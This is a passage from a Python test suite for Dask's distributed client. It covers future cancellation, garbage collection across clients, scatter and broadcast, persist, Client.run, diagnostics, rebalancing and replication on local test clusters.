        x.result()
        sleep(100)  # keep the connection alive; parent kills the process
@gen_cluster()
async def test_cleanup_after_broken_client_connection(s, a, b):
    """The scheduler releases a client's tasks when that client's process
    dies without closing cleanly."""
    proc = mp_context.Process(target=long_running_client_connection, args=(s.address,))
    proc.daemon = True
    proc.start()

    while not s.tasks:
        await asyncio.sleep(0.01)

    proc.terminate()  # simulate an abrupt client death

    while s.tasks:
        await asyncio.sleep(0.01)
@gen_cluster()
async def test_multi_garbage_collection(s, a, b):
    """Garbage-collecting futures on one client must not release data that
    another client still wants."""
    c = await Client(s.address, asynchronous=True)
    f = await Client(s.address, asynchronous=True)

    x = c.submit(inc, 1)
    y = f.submit(inc, 2)
    y2 = c.submit(inc, 2)
    assert y.key == y2.key
    await wait([x, y])

    x.__del__()  # only c wanted x, so its data disappears
    while x.key in a.data or x.key in b.data:
        await asyncio.sleep(0.01)

    assert s.wants_what == {c.id: {y.key}, f.id: {y.key}, "fire-and-forget": set()}
    assert s.who_wants == {y.key: {c.id, f.id}}

    y.__del__()  # f's handle gone, but c (via y2) still wants y
    while x.key in s.wants_what[f.id]:
        await asyncio.sleep(0.01)

    await asyncio.sleep(0.1)
    assert y.key in a.data or y.key in b.data
    assert s.wants_what == {c.id: {y.key}, f.id: set(), "fire-and-forget": set()}
    assert s.who_wants == {y.key: {c.id}}

    y2.__del__()  # last reference — now the data may be evicted
    while y.key in a.data or y.key in b.data:
        await asyncio.sleep(0.01)

    assert not any(v for v in s.wants_what.values())
    assert not s.who_wants

    await c.close()
    await f.close()
@gen_cluster(client=True)
async def test__broadcast(c, s, a, b):
    """Scattering with ``broadcast=True`` puts every datum on every worker."""
    x, y = await c.scatter([1, 2], broadcast=True)
    expected = {x.key: 1, y.key: 2}
    assert a.data == expected
    assert b.data == expected
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
async def test__broadcast_integer(c, s, *workers):
    """``broadcast=N`` replicates each scattered datum onto exactly N workers."""
    x, y = await c.scatter([1, 2], broadcast=2)
    assert len(s.tasks[x.key].who_has) == 2
    assert len(s.tasks[y.key].who_has) == 2
@gen_cluster(client=True)
async def test__broadcast_dict(c, s, a, b):
    """Scattering a dict with broadcast=True keeps the user-provided keys."""
    d = await c.scatter({"x": 1}, broadcast=True)
    assert a.data == b.data == {"x": 1}
def test_broadcast(c, s, a, b):
    """Synchronous scatter with broadcast, optionally restricted to a
    subset of workers."""
    x, y = c.scatter([1, 2], broadcast=True)

    has_what = sync(c.loop, c.scheduler.has_what)

    assert {k: set(v) for k, v in has_what.items()} == {
        a["address"]: {x.key, y.key},
        b["address"]: {x.key, y.key},
    }

    # broadcast restricted to worker a only lands z on a
    [z] = c.scatter([3], broadcast=True, workers=[a["address"]])

    has_what = sync(c.loop, c.scheduler.has_what)
    assert {k: set(v) for k, v in has_what.items()} == {
        a["address"]: {x.key, y.key, z.key},
        b["address"]: {x.key, y.key},
    }
@gen_cluster(client=True)
async def test_proxy(c, s, a, b):
    """Scheduler.proxy forwards a message to a worker and returns its reply."""
    msg = await c.scheduler.proxy(msg={"op": "identity"}, worker=a.address)
    assert msg["id"] == a.identity()["id"]
@gen_cluster(client=True)
async def test_cancel(c, s, a, b):
    """Cancelling a future also cancels its dependents and clears the
    scheduler."""
    x = c.submit(slowinc, 1)
    y = c.submit(slowinc, x)

    while y.key not in s.tasks:
        await asyncio.sleep(0.01)

    await c.cancel([x])

    assert x.cancelled()
    assert "cancel" in str(x)
    s.validate_state()

    # y depended on x, so it must become cancelled as well
    while not y.cancelled():
        await asyncio.sleep(0.01)

    assert not s.tasks
    s.validate_state()
@gen_cluster(client=True)
async def test_cancel_tuple_key(c, s, a, b):
    """Cancellation works for futures whose keys are tuples."""
    x = c.submit(inc, 1, key=("x", 0, 1))
    await x
    await c.cancel(x)
    with pytest.raises(CancelledError):
        await x
@gen_cluster()
async def test_cancel_multi_client(s, a, b):
    """One client cancelling a shared key does not cancel it for another
    client that submitted the same work."""
    c = await Client(s.address, asynchronous=True)
    f = await Client(s.address, asynchronous=True)

    x = c.submit(slowinc, 1)
    y = f.submit(slowinc, 1)

    assert x.key == y.key

    await c.cancel([x])

    assert x.cancelled()
    assert not y.cancelled()

    # the task is still scheduled on behalf of f
    while y.key not in s.tasks:
        await asyncio.sleep(0.01)

    out = await y
    assert out == 2

    with pytest.raises(CancelledError):
        await x

    await c.close()
    await f.close()
@gen_cluster(client=True)
async def test_cancel_collection(c, s, a, b):
    """Cancelling a dask collection cancels all of its underlying futures;
    repeating the cancel is harmless."""
    L = c.map(double, [[1], [2], [3]])
    x = db.Bag({("b", i): f for i, f in enumerate(L)}, "b", 3)

    await c.cancel(x)
    await c.cancel([x])  # idempotent
    assert all(f.cancelled() for f in L)
    while s.tasks:
        await asyncio.sleep(0.01)
def test_cancel_sync(c):
    """Synchronous cancel: dependents of a cancelled future become cancelled,
    independent futures keep working, and Future.cancel() also works."""
    x = c.submit(slowinc, 1, key="x")
    y = c.submit(slowinc, x, key="y")
    z = c.submit(slowinc, y, key="z")

    c.cancel([y])

    start = time()
    while not z.cancelled():
        sleep(0.01)
        assert time() < start + 30

    assert x.result() == 2  # x is independent of the cancelled chain

    z.cancel()
    assert z.cancelled()
@gen_cluster(client=True)
async def test_future_type(c, s, a, b):
    """A finished future records its result type and shows it in its repr."""
    future = c.submit(inc, 1)
    await wait([future])
    assert future.type == int
    assert "int" in str(future)
@gen_cluster(client=True)
async def test_traceback_clean(c, s, a, b):
    """Tracebacks of remote exceptions are scrubbed of scheduler/worker
    internal frames.

    Fix: removed the dead ``f = e`` binding — the exception object itself
    was never used, only ``sys.exc_info()`` inside the handler.
    """
    x = c.submit(div, 1, 0)
    try:
        await x
    except Exception:
        exc_type, exc_value, tb = sys.exc_info()
        while tb:
            assert "scheduler" not in tb.tb_frame.f_code.co_filename
            assert "worker" not in tb.tb_frame.f_code.co_filename
            tb = tb.tb_next
@gen_cluster(client=True)
async def test_map_different_lengths(c, s, a, b):
    """Client.map over unequal-length iterables truncates to the shortest.

    Fix: corrected the typo in the test name ("differnet" -> "different");
    pytest discovery is unaffected since the ``test_`` prefix is kept.
    """
    assert len(c.map(add, [1, 2], [1, 2, 3])) == 2
def test_Future_exception_sync_2(loop, capsys):
    """Entering a Client context sets it as the default scheduler without
    producing extra stdout noise; leaving the context restores the default."""
    with cluster() as (s, [a, b]):
        with Client(s["address"], loop=loop) as c:
            assert dask.base.get_scheduler() == c.get

    out, err = capsys.readouterr()
    assert len(out.strip().split("\n")) == 1  # only one line of output expected

    assert dask.base.get_scheduler() != c.get
@gen_cluster(timeout=60, client=True)
async def test_async_persist(c, s, a, b):
    """Client.persist on delayed objects returns collections of the same type
    whose graphs are collapsed to single futures, and preserves keys."""
    from dask.delayed import Delayed, delayed

    x = delayed(1)
    y = delayed(inc)(x)
    z = delayed(dec)(x)
    w = delayed(add)(y, z)

    yy, ww = c.persist([y, w])
    assert type(yy) == type(y)
    assert type(ww) == type(w)
    # persisted graphs are reduced to a single future per collection
    assert len(yy.dask) == 1
    assert len(ww.dask) == 1
    assert len(w.dask) > 1
    assert y.__dask_keys__() == yy.__dask_keys__()
    assert w.__dask_keys__() == ww.__dask_keys__()

    while y.key not in s.tasks and w.key not in s.tasks:
        await asyncio.sleep(0.01)

    assert s.who_wants[y.key] == {c.id}
    assert s.who_wants[w.key] == {c.id}

    yyf, wwf = c.compute([yy, ww])
    yyy, www = await c.gather([yyf, wwf])
    assert yyy == inc(1)
    assert www == add(inc(1), dec(1))

    # persist of a single collection returns a collection, not a list
    assert isinstance(c.persist(y), Delayed)
    assert isinstance(c.persist([y]), (list, tuple))
@gen_cluster(client=True)
async def test__persist(c, s, a, b):
    """Persisting a dask array replaces its graph with futures while keeping
    keys and computed values identical."""
    pytest.importorskip("dask.array")
    import dask.array as da

    x = da.ones((10, 10), chunks=(5, 10))
    y = 2 * (x + 1)
    assert len(y.dask) == 6
    yy = c.persist(y)

    assert len(y.dask) == 6  # original graph untouched
    assert len(yy.dask) == 2  # one future per chunk
    assert all(isinstance(v, Future) for v in yy.dask.values())
    assert yy.__dask_keys__() == y.__dask_keys__()

    g, h = c.compute([y, yy])

    gg, hh = await c.gather([g, h])
    assert (gg == hh).all()
def test_persist(c):
    """Synchronous counterpart of test__persist: persisted and original
    arrays compute to the same values."""
    pytest.importorskip("dask.array")
    import dask.array as da

    x = da.ones((10, 10), chunks=(5, 10))
    y = 2 * (x + 1)
    assert len(y.dask) == 6
    yy = c.persist(y)
    assert len(y.dask) == 6
    assert len(yy.dask) == 2
    assert all(isinstance(v, Future) for v in yy.dask.values())
    assert yy.__dask_keys__() == y.__dask_keys__()

    zz = yy.compute()
    z = y.compute()
    assert (zz == z).all()
@gen_cluster(timeout=60, client=True)
async def test_long_traceback(c, s, a, b):
    """Deeply recursive tracebacks are truncated so their pickled size stays
    bounded, while the exception type is preserved."""
    from distributed.protocol.pickle import dumps

    def deep(n):
        if n == 0:
            1 / 0
        else:
            return deep(n - 1)

    x = c.submit(deep, 200)
    await wait([x])
    assert len(dumps(c.futures[x.key].traceback)) < 10000
    assert isinstance(c.futures[x.key].exception, ZeroDivisionError)
@gen_cluster(client=True)
async def test_wait_on_collections(c, s, a, b):
    """wait() accepts a dask collection and waits on its underlying futures."""
    L = c.map(double, [[1], [2], [3]])
    x = db.Bag({("b", i): f for i, f in enumerate(L)}, "b", 3)

    await wait(x)
    assert all(f.key in a.data or f.key in b.data for f in L)
@gen_cluster(client=True)
async def test_futures_of_get(c, s, a, b):
    """futures_of extracts futures from scalars, nested containers, dask
    collections, and SubgraphCallable task graphs."""
    x, y, z = c.map(inc, [1, 2, 3])

    assert set(futures_of(0)) == set()
    assert set(futures_of(x)) == {x}
    assert set(futures_of([x, y, z])) == {x, y, z}
    assert set(futures_of([x, [y], [[z]]])) == {x, y, z}
    assert set(futures_of({"x": x, "y": [y]})) == {x, y}

    b = db.Bag({("b", i): f for i, f in enumerate([x, y, z])}, "b", 3)
    assert set(futures_of(b)) == {x, y, z}

    sg = SubgraphCallable(
        {"x": x, "y": y, "z": z, "out": (add, (add, (add, x, y), z), "in")},
        "out",
        ("in",),
    )
    assert set(futures_of(sg)) == {x, y, z}
def test_futures_of_class():
    """futures_of ignores classes (as opposed to instances) in its input."""
    da = pytest.importorskip("dask.array")
    assert futures_of([da.Array]) == []
@gen_cluster(client=True)
async def test_futures_of_cancelled_raises(c, s, a, b):
    """Any use of a cancelled future — await, get, submit, map — raises
    CancelledError, and dependent keys never reach the scheduler."""
    x = c.submit(inc, 1)
    await c.cancel([x])

    with pytest.raises(CancelledError):
        await x

    with pytest.raises(CancelledError):
        await c.get({"x": (inc, x), "y": (inc, 2)}, ["x", "y"], sync=False)

    with pytest.raises(CancelledError):
        c.submit(inc, x)

    with pytest.raises(CancelledError):
        c.submit(add, 1, y=x)

    with pytest.raises(CancelledError):
        c.map(add, [1], y=x)

    assert "y" not in s.tasks
@pytest.mark.skip
@gen_cluster(nthreads=[("127.0.0.1", 1)], client=True)
async def test_dont_delete_recomputed_results(c, s, w):
    """Recomputed results should not be deleted by a stale release of the
    earlier identical key. (Currently skipped.)"""
    x = c.submit(inc, 1)  # compute first time
    await wait([x])
    x.__del__()  # trigger garbage collection
    await asyncio.sleep(0)
    xx = c.submit(inc, 1)  # compute second time

    start = time()
    while xx.key not in w.data:  # data shows up
        await asyncio.sleep(0.01)
        assert time() < start + 1

    while time() < start + (s.delete_interval + 100) / 1000:  # and stays
        assert xx.key in w.data
        await asyncio.sleep(0.01)
@gen_cluster(nthreads=[], client=True)
async def test_fatally_serialized_input(c, s):
    """A task whose input kills workers on deserialization still registers on
    a workerless scheduler without crashing it."""
    o = FatallySerializedObject()

    future = c.submit(inc, o)

    while not s.tasks:
        await asyncio.sleep(0.01)
@pytest.mark.skip(reason="Use fast random selection now")
@gen_cluster(client=True)
async def test_balance_tasks_by_stacks(c, s, a, b):
    """Sequentially submitted tasks land on different workers. (Skipped:
    scheduling now uses fast random selection.)"""
    x = c.submit(inc, 1)
    await wait(x)

    y = c.submit(inc, 2)
    await wait(y)

    assert len(a.data) == len(b.data) == 1
@gen_cluster(client=True)
async def test_run(c, s, a, b):
    """Client.run executes a function on all workers, a subset, or none."""
    results = await c.run(inc, 1)
    assert results == {a.address: 2, b.address: 2}

    results = await c.run(inc, 1, workers=[a.address])
    assert results == {a.address: 2}

    results = await c.run(inc, 1, workers=[])
    assert results == {}
@gen_cluster(client=True)
async def test_run_handles_picklable_data(c, s, a, b):
    """run/run_on_scheduler round-trip common picklable return values."""
    futures = c.map(inc, range(10))
    await wait(futures)

    def func():
        return {}, set(), [], (), 1, "hello", b"100"

    results = await c.run_on_scheduler(func)
    assert results == func()

    results = await c.run(func)
    assert results == {w.address: func() for w in [a, b]}
def test_run_sync(c, s, a, b):
    """Synchronous Client.run forwards args/kwargs and honours `workers`."""

    def func(x, y=10):
        return x + y

    result = c.run(func, 1, y=2)
    assert result == {a["address"]: 3, b["address"]: 3}

    result = c.run(func, 1, y=2, workers=[a["address"]])
    assert result == {a["address"]: 3}
@gen_cluster(client=True)
async def test_run_coroutine(c, s, a, b):
    """Client.run supports coroutine functions, propagates their exceptions,
    and works with native async functions."""
    results = await c.run(geninc, 1, delay=0.05)
    assert results == {a.address: 2, b.address: 2}

    results = await c.run(geninc, 1, delay=0.05, workers=[a.address])
    assert results == {a.address: 2}

    results = await c.run(geninc, 1, workers=[])
    assert results == {}

    with pytest.raises(RuntimeError, match="hello"):
        await c.run(throws, 1)

    results = await c.run(asyncinc, 2, delay=0.01)
    assert results == {a.address: 3, b.address: 3}
def test_run_coroutine_sync(c, s, a, b):
    """Synchronous Client.run of coroutines; wait=False returns immediately
    with None instead of blocking for the result."""
    result = c.run(geninc, 2, delay=0.01)
    assert result == {a["address"]: 3, b["address"]: 3}

    result = c.run(geninc, 2, workers=[a["address"]])
    assert result == {a["address"]: 3}

    t1 = time()
    result = c.run(geninc, 2, delay=10, wait=False)
    t2 = time()
    assert result is None
    assert t2 - t1 <= 1.0  # fire-and-forget must not wait out the delay
@gen_cluster(client=True)
async def test_run_coroutine_deprecated(c, s, a, b):
    """Client.run_coroutine still works but emits a FutureWarning pointing
    at Client.run."""

    async def foo():
        return "bar"

    with pytest.warns(FutureWarning, match="Client.run "):
        results = await c.run_coroutine(foo)
    assert results == {a.address: "bar", b.address: "bar"}
def test_run_exception(c):
    """Exceptions raised inside Client.run re-raise with their original type
    and message on the client side."""

    def raise_exception(exc_type, exc_msg):
        raise exc_type(exc_msg)

    for exc_type in [ValueError, RuntimeError]:
        with pytest.raises(exc_type, match="informative message"):
            c.run(raise_exception, exc_type, "informative message")
def test_diagnostic_ui(loop):
    """Client diagnostics: nthreads/who_has/has_what accept no argument, a
    list, or a single address/future and filter accordingly."""
    with cluster() as (s, [a, b]):
        a_addr = a["address"]
        b_addr = b["address"]
        with Client(s["address"], loop=loop) as c:
            d = c.nthreads()
            assert d == {a_addr: 1, b_addr: 1}

            d = c.nthreads([a_addr])
            assert d == {a_addr: 1}
            d = c.nthreads(a_addr)
            assert d == {a_addr: 1}
            d = c.nthreads(a["address"])
            assert d == {a_addr: 1}

            x = c.submit(inc, 1)
            y = c.submit(inc, 2)
            z = c.submit(inc, 3)
            wait([x, y, z])
            d = c.who_has()
            assert set(d) == {x.key, y.key, z.key}
            assert all(w in [a_addr, b_addr] for v in d.values() for w in v)
            assert all(d.values())

            d = c.who_has([x, y])
            assert set(d) == {x.key, y.key}

            d = c.who_has(x)
            assert set(d) == {x.key}

            d = c.has_what()
            assert set(d) == {a_addr, b_addr}
            assert all(k in [x.key, y.key, z.key] for v in d.values() for k in v)

            d = c.has_what([a_addr])
            assert set(d) == {a_addr}

            d = c.has_what(a_addr)
            assert set(d) == {a_addr}
def test_diagnostic_nbytes_sync(c):
    """Client.nbytes reports per-key sizes, or per-task-prefix totals when
    summary=True."""
    incs = c.map(inc, [1, 2, 3])
    doubles = c.map(double, [1, 2, 3])
    wait(incs + doubles)

    assert c.nbytes(summary=False) == {k.key: sizeof(1) for k in incs + doubles}
    assert c.nbytes(summary=True) == {"inc": sizeof(1) * 3, "double": sizeof(1) * 3}
@gen_cluster(client=True)
async def test_diagnostic_nbytes(c, s, a, b):
    """Scheduler.get_nbytes mirrors Client.nbytes: per key or summarized by
    task prefix."""
    incs = c.map(inc, [1, 2, 3])
    doubles = c.map(double, [1, 2, 3])
    await wait(incs + doubles)

    assert s.get_nbytes(summary=False) == {k.key: sizeof(1) for k in incs + doubles}
    assert s.get_nbytes(summary=True) == {"inc": sizeof(1) * 3, "double": sizeof(1) * 3}
@gen_cluster(client=True, nthreads=[])
async def test_worker_aliases(c, s):
    """Worker name aliases (strings and non-strings) are accepted wherever a
    worker address is, e.g. `workers=` in map/scatter/submit."""
    a = Worker(s.address, name="alice")
    b = Worker(s.address, name="bob")
    w = Worker(s.address, name=3)
    await asyncio.gather(a, b, w)

    L = c.map(inc, range(10), workers="alice")
    future = await c.scatter(123, workers=3)
    await wait(L)
    assert len(a.data) == 10
    assert len(b.data) == 0
    assert dict(w.data) == {future.key: 123}

    for i, alias in enumerate([3, [3], "alice"]):
        result = await c.submit(lambda x: x + 1, i, workers=alias)
        assert result == i + 1

    await asyncio.gather(a.close(), b.close(), w.close())
def test_persist_get_sync(c):
    """A delayed graph built on top of a persisted collection computes to the
    correct value synchronously."""
    x, y = delayed(1), delayed(2)
    xx = delayed(add)(x, x)
    yy = delayed(add)(y, y)
    xxyy = delayed(add)(xx, yy)

    xxyy2 = c.persist(xxyy)
    xxyy3 = delayed(add)(xxyy2, 10)

    assert xxyy3.compute() == ((1 + 1) + (2 + 2)) + 10
@gen_cluster(client=True)
async def test_persist_get(c, s, a, b):
    """Graphs layered over a persisted collection compute correctly via both
    Client.get and (repeated) Client.compute."""
    x, y = delayed(1), delayed(2)
    xx = delayed(add)(x, x)
    yy = delayed(add)(y, y)
    xxyy = delayed(add)(xx, yy)

    xxyy2 = c.persist(xxyy)
    xxyy3 = delayed(add)(xxyy2, 10)

    await asyncio.sleep(0.5)
    result = await c.gather(c.get(xxyy3.dask, xxyy3.__dask_keys__(), sync=False))
    assert result[0] == ((1 + 1) + (2 + 2)) + 10

    # compute is repeatable on the same collection
    result = await c.compute(xxyy3)
    assert result == ((1 + 1) + (2 + 2)) + 10

    result = await c.compute(xxyy3)
    assert result == ((1 + 1) + (2 + 2)) + 10

    result = await c.compute(xxyy3)
    assert result == ((1 + 1) + (2 + 2)) + 10
@pytest.mark.skipif(WINDOWS, reason="num_fds not supported on windows")
def test_client_num_fds(loop):
    """Opening and closing extra clients does not leak file descriptors."""
    with cluster() as (s, [a, b]):
        proc = psutil.Process()
        with Client(s["address"], loop=loop) as c:  # first client to start loop
            before = proc.num_fds()  # measure
            for i in range(4):
                with Client(s["address"], loop=loop):  # start more clients
                    pass
            start = time()
            while proc.num_fds() > before:
                sleep(0.01)
            assert time() < start + 10, (before, proc.num_fds())
@gen_cluster()
async def test_startup_close_startup(s, a, b):
    """A second client can connect to a scheduler after the first closed."""
    c = await Client(s.address, asynchronous=True)
    await c.close()

    c = await Client(s.address, asynchronous=True)
    await c.close()
def test_startup_close_startup_sync(loop):
    """Repeatedly opening/closing synchronous clients against one scheduler
    works, with and without an explicit loop."""
    with cluster() as (s, [a, b]):
        with Client(s["address"], loop=loop) as c:
            sleep(0.1)
        with Client(s["address"]) as c:
            pass
        with Client(s["address"]) as c:
            pass
        sleep(0.1)
        with Client(s["address"]) as c:
            pass
@gen_cluster(client=True)
async def test_badly_serialized_exceptions(c, s, a, b):
    """An exception that itself fails to pickle still reaches the client with
    its message intact."""

    def f():
        class BadlySerializedException(Exception):
            def __reduce__(self):
                raise TypeError()

        raise BadlySerializedException("hello world")

    x = c.submit(f)
    with pytest.raises(Exception, match="hello world"):
        await x
@gen_cluster(
    client=True,
    Worker=Nanny,
    worker_kwargs={"memory_limit": "1 GiB"},
    config={"distributed.worker.memory.rebalance.sender-min": 0.3},
)
async def test_rebalance(c, s, *_):
    """Test Client.rebalance(). These are just to test the Client wrapper around
    Scheduler.rebalance(); for more thorough tests on the latter see test_scheduler.py.
    """
    # We used nannies to have separate processes for each worker
    a, b = s.workers

    # Generate 10 buffers worth 512 MiB total on worker a. This sends its memory
    # utilisation slightly above 50% (after counting unmanaged) which is above the
    # distributed.worker.memory.rebalance.sender-min threshold.
    futures = c.map(lambda _: "x" * (2 ** 29 // 10), range(10), workers=[a])
    await wait(futures)

    # Wait for heartbeats
    while s.memory.process < 2 ** 29:
        await asyncio.sleep(0.1)

    assert await c.run(lambda dask_worker: len(dask_worker.data)) == {a: 10, b: 0}

    await c.rebalance()
    ndata = await c.run(lambda dask_worker: len(dask_worker.data))
    # Allow for some uncertainty as the unmanaged memory is not stable
    assert sum(ndata.values()) == 10
    assert 3 <= ndata[a] <= 7
    assert 3 <= ndata[b] <= 7
@gen_cluster(
    nthreads=[("127.0.0.1", 1)] * 3,
    client=True,
    Worker=Nanny,
    worker_kwargs={"memory_limit": "1 GiB"},
)
async def test_rebalance_workers_and_keys(client, s, *_):
    """Test Client.rebalance(). These are just to test the Client wrapper around
    Scheduler.rebalance(); for more thorough tests on the latter see test_scheduler.py.
    """
    a, b, c = s.workers
    futures = client.map(lambda _: "x" * (2 ** 29 // 10), range(10), workers=[a])
    await wait(futures)

    # Wait for heartbeats
    while s.memory.process < 2 ** 29:
        await asyncio.sleep(0.1)

    # Passing empty iterables is not the same as omitting the arguments
    await client.rebalance([])
    await client.rebalance(workers=[])
    assert await client.run(lambda dask_worker: len(dask_worker.data)) == {
        a: 10,
        b: 0,
        c: 0,
    }

    # Limit rebalancing to two arbitrary keys and two arbitrary workers.
    await client.rebalance([futures[3], futures[7]], [a, b])
    assert await client.run(lambda dask_worker: len(dask_worker.data)) == {
        a: 8,
        b: 2,
        c: 0,
    }

    with pytest.raises(KeyError):
        await client.rebalance(workers=["notexist"])
def test_rebalance_sync():
    """Synchronous Client.rebalance() spreads keys between workers."""
    # can't use the 'c' fixture because we need workers to run in a separate process
    with Client(n_workers=2, memory_limit="1 GiB", dashboard_address=":0") as c:
        s = c.cluster.scheduler
        a, b = (ws.address for ws in s.workers.values())
        futures = c.map(lambda _: "x" * (2 ** 29 // 10), range(10), workers=[a])
        wait(futures)

        # Wait for heartbeat
        while s.memory.process < 2 ** 29:
            sleep(0.1)

        assert c.run(lambda dask_worker: len(dask_worker.data)) == {a: 10, b: 0}
        c.rebalance()
        ndata = c.run(lambda dask_worker: len(dask_worker.data))
        # Allow for some uncertainty as the unmanaged memory is not stable
        assert sum(ndata.values()) == 10
        assert 3 <= ndata[a] <= 7
        assert 3 <= ndata[b] <= 7
@gen_cluster(client=True)
async def test_rebalance_unprepared(c, s, a, b):
    """Client.rebalance() internally waits for unfinished futures"""
    futures = c.map(slowinc, range(10), delay=0.05, workers=a.address)
    # Let the futures reach the scheduler
    await asyncio.sleep(0.1)
    # We didn't wait enough for futures to complete. However, Client.rebalance() will
    # block until all futures are completed before invoking Scheduler.rebalance().
    await c.rebalance(futures)
    s.validate_state()
@gen_cluster(client=True)
async def test_rebalance_raises_on_explicit_missing_data(c, s, a, b):
    """rebalance() raises KeyError if explicitly listed futures disappear"""
    f = Future("x", client=c, state="memory")
    with pytest.raises(KeyError, match="Could not rebalance keys:"):
        await c.rebalance(futures=[f])
@gen_cluster(client=True)
async def test_receive_lost_key(c, s, a, b):
    """A future's status leaves 'finished' when the only worker holding its
    data closes."""
    x = c.submit(inc, 1, workers=[a.address])
    await x
    await a.close()

    while x.status == "finished":
        await asyncio.sleep(0.01)
@pytest.mark.skipif(not LINUX, reason="Need 127.0.0.2 to mean localhost")
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_unrunnable_task_runs(c, s, a, b):
    """A task whose only eligible worker vanished becomes 'no-worker' and
    runs again once a suitable worker joins."""
    x = c.submit(inc, 1, workers=[a.ip])
    await x

    await a.close()
    while x.status == "finished":
        await asyncio.sleep(0.01)

    assert s.tasks[x.key] in s.unrunnable
    assert s.get_task_status(keys=[x.key]) == {x.key: "no-worker"}

    w = await Worker(s.address, loop=s.loop)
    while x.status != "finished":
        await asyncio.sleep(0.01)

    assert s.tasks[x.key] not in s.unrunnable
    result = await x
    assert result == 2
    await w.close()
@gen_cluster(client=True, nthreads=[])
async def test_add_worker_after_tasks(c, s):
    """Tasks submitted to an empty cluster run once a worker (via Nanny)
    joins."""
    futures = c.map(inc, range(10))
    n = await Nanny(s.address, nthreads=2, loop=s.loop)
    await c.gather(futures)
    await n.close()
@pytest.mark.skipif(not LINUX, reason="Need 127.0.0.2 to mean localhost")
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_workers_register_indirect_data(c, s, a, b):
    """When a worker fetches a dependency from a peer, the scheduler records
    the new replica in who_has/has_what."""
    [x] = await c.scatter([1], workers=a.address)
    y = c.submit(inc, x, workers=b.ip)
    await y
    assert b.data[x.key] == 1
    assert s.tasks[x.key].who_has == {s.workers[a.address], s.workers[b.address]}
    assert s.workers[b.address].has_what == {s.tasks[x.key], s.tasks[y.key]}
    s.validate_state()
@gen_cluster(client=True)
async def test_submit_on_cancelled_future(c, s, a, b):
    """Submitting new work that depends on a cancelled future raises."""
    x = c.submit(inc, 1)
    await x

    await c.cancel(x)

    with pytest.raises(CancelledError):
        c.submit(inc, x)
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 10)
async def test_replicate(c, s, *workers):
    """Scheduler.replicate copies keys onto the requested number of workers."""
    [a, b] = await c.scatter([1, 2])
    await s.replicate(keys=[a.key, b.key], n=5)
    s.validate_state()

    assert len(s.tasks[a.key].who_has) == 5
    assert len(s.tasks[b.key].who_has) == 5

    assert sum(a.key in w.data for w in workers) == 5
    assert sum(b.key in w.data for w in workers) == 5
@gen_cluster(client=True)
async def test_replicate_tuple_keys(c, s, a, b):
    """replicate/rebalance accept futures whose keys are tuples."""
    x = delayed(inc)(1, dask_key_name=("x", 1))
    f = c.persist(x)
    await c.replicate(f, n=5)
    s.validate_state()
    assert a.data and b.data

    await c.rebalance(f)
    s.validate_state()
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 10)
async def test_replicate_workers(c, s, *workers):
    """replicate with a workers= restriction only touches those workers;
    n=None means replicate everywhere; shrinking to n=1 deletes replicas
    only inside the restricted set."""
    [a, b] = await c.scatter([1, 2], workers=[workers[0].address])
    await s.replicate(
        keys=[a.key, b.key], n=5, workers=[w.address for w in workers[:5]]
    )

    assert len(s.tasks[a.key].who_has) == 5
    assert len(s.tasks[b.key].who_has) == 5

    assert sum(a.key in w.data for w in workers[:5]) == 5
    assert sum(b.key in w.data for w in workers[:5]) == 5
    assert sum(a.key in w.data for w in workers[5:]) == 0
    assert sum(b.key in w.data for w in workers[5:]) == 0

    await s.replicate(keys=[a.key, b.key], n=1)

    assert len(s.tasks[a.key].who_has) == 1
    assert len(s.tasks[b.key].who_has) == 1
    assert sum(a.key in w.data for w in workers) == 1
    assert sum(b.key in w.data for w in workers) == 1

    s.validate_state()

    await s.replicate(keys=[a.key, b.key], n=None)  # all
    assert len(s.tasks[a.key].who_has) == 10
    assert len(s.tasks[b.key].who_has) == 10
    s.validate_state()

    await s.replicate(
        keys=[a.key, b.key], n=1, workers=[w.address for w in workers[:5]]
    )
    # exactly one replica remains within the restricted set...
    assert sum(a.key in w.data for w in workers[:5]) == 1
    assert sum(b.key in w.data for w in workers[:5]) == 1
    # ...while replicas outside the restriction are untouched
    assert sum(a.key in w.data for w in workers[5:]) == 5
    assert sum(b.key in w.data for w in workers[5:]) == 5
    s.validate_state()
class CountSerialization:
    """Counts how many times an instance has been serialized.

    ``__getstate__`` pickles the current counter and ``__setstate__``
    restores it incremented by one, so each pickle round-trip bumps ``n``.
    """

    def __init__(self):
        self.n = 0

    def __getstate__(self):
        return self.n

    def __setstate__(self, n):
        self.n = n + 1
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 10)
async def test_replicate_tree_branching(c, s, *workers):
    """Replication fans out through intermediate workers (tree broadcast):
    some copies are made from replicas, not all from the original holder."""
    obj = CountSerialization()
    [future] = await c.scatter([obj])
    await s.replicate(keys=[future.key], n=10)

    max_count = max(w.data[future.key].n for w in workers)
    assert max_count > 1
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 10)
async def test_client_replicate(c, s, *workers):
    """Client.replicate grows, shrinks, and (with no n) maximizes replicas."""
    x = c.submit(inc, 1)
    y = c.submit(inc, 2)
    await c.replicate([x, y], n=5)

    assert len(s.tasks[x.key].who_has) == 5
    assert len(s.tasks[y.key].who_has) == 5

    await c.replicate([x, y], n=3)

    assert len(s.tasks[x.key].who_has) == 3
    assert len(s.tasks[y.key].who_has) == 3

    await c.replicate([x, y])  # default: replicate to all workers
    s.validate_state()

    assert len(s.tasks[x.key].who_has) == 10
    assert len(s.tasks[y.key].who_has) == 10
@pytest.mark.skipif(not LINUX, reason="Need 127.0.0.2 to mean localhost")
@gen_cluster(
    client=True,
    nthreads=[("127.0.0.1", 1), ("127.0.0.2", 1), ("127.0.0.2", 1)],
)
async def test_client_replicate_host(client, s, a, b, c):
    """replicate accepts host names (without ports) as worker restrictions."""
    aws = s.workers[a.address]
    bws = s.workers[b.address]
    cws = s.workers[c.address]

    x = client.submit(inc, 1, workers="127.0.0.2")
    await wait([x])
    assert s.tasks[x.key].who_has == {bws} or s.tasks[x.key].who_has == {cws}

    await client.replicate([x], workers=["127.0.0.2"])
    assert s.tasks[x.key].who_has == {bws, cws}

    await client.replicate([x], workers=["127.0.0.1"])
    assert s.tasks[x.key].who_has == {aws, bws, cws}
